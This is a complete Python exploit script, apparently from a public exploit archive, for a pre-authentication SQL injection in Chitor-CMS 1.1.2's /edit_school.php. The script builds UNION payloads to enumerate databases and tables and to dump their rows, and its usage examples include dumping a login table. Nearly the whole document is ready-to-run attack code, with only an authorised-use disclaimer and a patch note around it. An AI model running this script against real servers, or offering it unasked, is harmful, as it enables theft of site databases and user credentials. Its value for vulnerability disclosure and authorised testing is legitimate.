Chitor-CMS 1.1.2 SQL Injection

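#!/usr/bin/python3
########################################################
## Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection
## Date: 2023/04/13
## ExploitAuthor: msd0pe
## Project: https://github.com/waqaskanju/Chitor-CMS
## My Github: https://github.com/msd0pe-1
## Patched the 2023/04/16: 69d3442 commit
##
## The injection point is the unauthenticated `id` parameter of
## /edit_school.php.  Every request is a UNION-based injection whose third
## column carries a JSON_ARRAYAGG() result wrapped in fixed marker strings,
## so the answer can be cut out of the returned HTML with a regex.
## JSON_ARRAYAGG() needs MySQL 5.7.22+ (or a recent MariaDB); on older
## servers the query errors out and every listing comes back empty.
########################################################
"""Chitor-CMS < 1.1.2 pre-auth SQL injection: list databases/tables, dump a table.

Only run this against systems you are explicitly authorised to test.
"""
import json
import optparse
import re
import sys

import requests
from prettytable import PrettyTable

__description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.'
__author__ = 'msd0pe'
__version__ = '1.1'
__date__ = '2023/04/13'


class bcolors:
    """ANSI escape sequences used for the console output."""
    PURPLE = '\033[95m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    OCRA = '\033[93m'
    RED = '\033[91m'
    CYAN = '\033[96m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


class infos:
    """Coloured log-line prefixes."""
    INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] "
    ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] "
    GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] "
    PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "


# Vulnerable script, and an id value that makes the application's own query
# return no rows so that only the UNION part ends up in the page.
INJECT_PATH = "/edit_school.php"
NO_ROW_ID = "-2164"

HEADERS = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
TIMEOUT = 20  # seconds; the original never set one and could hang forever

# Marker strings (sent to the server hex-encoded so the query needs no quotes).
START_MARK = "qpzkq"   # 0x71707a6b71
END_MARK = "qjkbq"     # 0x716a6b6271
FIELD_SEP = "xzmdpl"   # 0x787a6d64706c, separates the columns of one dumped row
_RESULT_RE = re.compile(re.escape(START_MARK) + r"\[(.*?)\]" + re.escape(END_MARK), re.S)


def _hexstr(value: str) -> str:
    """Return *value* as a MySQL hex literal (0x...) so it needs no quoting."""
    if not value:
        return "''"
    return "0x" + value.encode("utf-8").hex()


def _parse_result(html: str) -> list:
    """Extract the JSON array placed between the markers and return its elements.

    Returns an empty list when the markers are absent (SQL error, unaffected
    target) or the array is empty.  Elements are decoded with the json module
    so values containing commas or quotes survive; a JSON null becomes "".
    """
    match = _RESULT_RE.search(html)
    if match is None or not match.group(1):
        return []
    body = match.group(1)
    try:
        values = json.loads("[" + body + "]")
    except ValueError:
        # Fall back to the original naive splitting if the page mangled the JSON.
        values = body.replace('"', "").split(",")
    return ["" if v is None else str(v) for v in values]


def _inject(url: str, select_expr: str, from_clause: str) -> list:
    """Run one UNION injection and return the aggregated values.

    *select_expr* is the expression JSON_ARRAYAGG() aggregates, *from_clause*
    the rest of the statement ("FROM ... WHERE ...").  A UNION must match the
    column count of the application's query, which is evidently three.
    Raises requests.RequestException on network failure.
    """
    sql = ("%s' UNION ALL SELECT NULL,NULL,CONCAT(%s,JSON_ARRAYAGG(%s),%s) %s-- -"
           % (NO_ROW_ID, _hexstr(START_MARK), select_expr, _hexstr(END_MARK), from_clause))
    # requests percent-encodes the quotes, commas and spaces of the payload for us.
    response = requests.get(url.rstrip("/") + INJECT_PATH, params={"id": sql},
                            headers=HEADERS, timeout=TIMEOUT)
    return _parse_result(response.text)


def DumpTable(url, database, table):
    """Print every row of *database*.*table*; the column names are looked up first."""
    columns = _inject(url, "column_name",
                      "FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=%s AND table_schema=%s"
                      % (_hexstr(table), _hexstr(database)))
    result = PrettyTable()
    result.field_names = columns
    if columns:
        # IFNULL keeps the field count stable: CONCAT_WS() silently drops NULL
        # arguments, which misaligned rows (and re-added them) in the original.
        row_expr = "CONCAT_WS(%s,%s)" % (
            _hexstr(FIELD_SEP), ",".join("IFNULL(`%s`,'')" % c for c in columns))
        for raw_row in _inject(url, row_expr, "FROM `%s`.`%s`" % (database, table)):
            cells = raw_row.split(FIELD_SEP)
            # Defensive padding/truncation so one odd row cannot abort the dump.
            cells = (cells + [""] * len(columns))[:len(columns)]
            result.add_row(cells)
    print(result)


def ListTables(url, database):
    """Print the table names of *database*."""
    result = PrettyTable()
    result.field_names = ["TABLES"]
    names = _inject(url, "table_name",
                    "FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=%s" % _hexstr(database))
    for name in names:
        result.add_row([name])
    print(result)


def ListDatabases(url):
    """Print every schema name visible to the application's database user."""
    result = PrettyTable()
    result.field_names = ["DATABASES"]
    for name in _inject(url, "schema_name", "FROM INFORMATION_SCHEMA.SCHEMATA"):
        result.add_row([name])
    print(result)


def _build_parser() -> optparse.OptionParser:
    """Build the command-line parser; examples are attached *before* parsing so --help shows them."""
    parser = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__)
    parser.add_option('-u', '--url', type="str", dest="url", help='target url')
    parser.add_option('--dbs', action="store_true", dest="l_databases", help='list databases')
    parser.add_option('-D', '--db', type="str", dest="database", help='select a database')
    parser.add_option('--tables', action="store_true", dest="l_tables", help='list tables')
    parser.add_option('-T', '--table', type="str", dest="table", help='select a table')
    parser.add_option('--dump', action="store_true", dest="dump", help='dump the content')
    examples = optparse.OptionGroup(parser, "Examples", """
python3 chitor1.1.py -u http://127.0.0.1 --dbs
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump""")
    parser.add_option_group(examples)
    return parser


def _print_banner(parser: optparse.OptionParser) -> None:
    """Print usage plus the legal notice."""
    parser.print_help()
    print('')
    print(' %s' % __description__)
    print(' Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe'
          + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright'
          + bcolors.ENDC + bcolors.ENDC)
    print(' Any malicious or illegal activity may be punishable by law')
    print(' Use at your own risk')


def Main():
    """Parse the command line and run the requested action(s).

    Shows the help text when no URL or no action is given (the original stayed
    silent in that case) and reports network errors instead of swallowing them.
    """
    parser = _build_parser()
    options, args = parser.parse_args()

    wants_databases = bool(options.l_databases)
    wants_tables = options.database is not None and bool(options.l_tables)
    wants_dump = (options.database is not None and options.table is not None
                  and bool(options.dump))

    if args or options.url is None or not (wants_databases or wants_tables or wants_dump):
        _print_banner(parser)
        return

    try:
        if wants_databases:
            ListDatabases(options.url)
        if wants_tables:
            ListTables(options.url, options.database)
        if wants_dump:
            DumpTable(options.url, options.database, options.table)
    except requests.RequestException as exc:
        # Network-level failures used to surface as a bare "Unexpected error".
        print(infos.ERROR + "Request to %s failed: %s" % (options.url, exc))
        sys.exit(1)


if __name__ == '__main__':
    try:
        Main()
    except KeyboardInterrupt:
        print()
        print(infos.PROCESS + "Exiting...")
        print()
        sys.exit(1)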

Source: cxsecurity.com/issue/WLB-2023040069
